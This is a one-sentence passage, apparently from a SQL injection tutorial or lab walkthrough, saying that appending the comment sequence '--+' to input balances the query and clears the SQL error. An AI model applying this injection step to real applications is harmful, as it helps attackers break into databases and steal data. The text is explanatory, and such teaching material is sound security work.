So now let’s start with our next phase, Using this query "--+" the error of the SQL is fixed so queries are balanced successfully.